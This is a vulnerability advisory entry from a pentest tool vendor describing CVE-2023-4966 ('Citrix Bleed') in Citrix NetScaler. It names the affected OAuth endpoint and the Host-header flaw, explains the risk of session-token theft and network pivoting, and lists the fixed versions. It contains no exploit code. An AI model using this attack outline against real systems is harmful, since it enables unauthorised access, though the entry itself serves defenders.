HomePentest-Tools.com Logo

Citrix NetScaler - Memory Leak CVE-2023-4966

Severity
CVSSv3 Score
9.4
Vulnerability description

Citrix NetScaler server is vulnerable to CVE-2023-4966, an Information Disclosure vulnerability that can be leveraged to achieve unauthorized authentication on the device, affecting the /oauth/idp/.well-known/openid-configuration endpoint. The root cause of this vulnerability is an improper sanitization of user-provided input inside the Host header. This vulnerability allows an unauthenticated remote attacker to dump a session token in order to authenticate on the webserver.

Risk description

The risk exists that an unauthenticated remote attacker could leverage the Information Disclosure vulnerability to authenticate on the device in order to pivot in the internal network which will result in a fully compromised network through which they could steal confidential information.

Exploit capabilities

Sniper can extract custom artefacts as evidence from the target system.

Recommendation

Update the Citrix NetScaler server to one of the currently fixed versions: NetScaler ADC and NetScaler Gateway after versions 14.1-8.50, 13.1-49.50, 13.0-92.19, NetScaler ADC FIPS after versions 13.1-37.164, 12.1-55.300, and NetScaler ADC NDcPP after version 12.1-55.300.

Codename
Citrix Bleed
Detectable with
Network Scanner
Scan engine
Sniper
Exploitable with Sniper
Yes
CVE Published
Oct 10, 2023
Detection added at
Software Type
Network Management
Vendor
Citrix
Product
Citrix NetScaler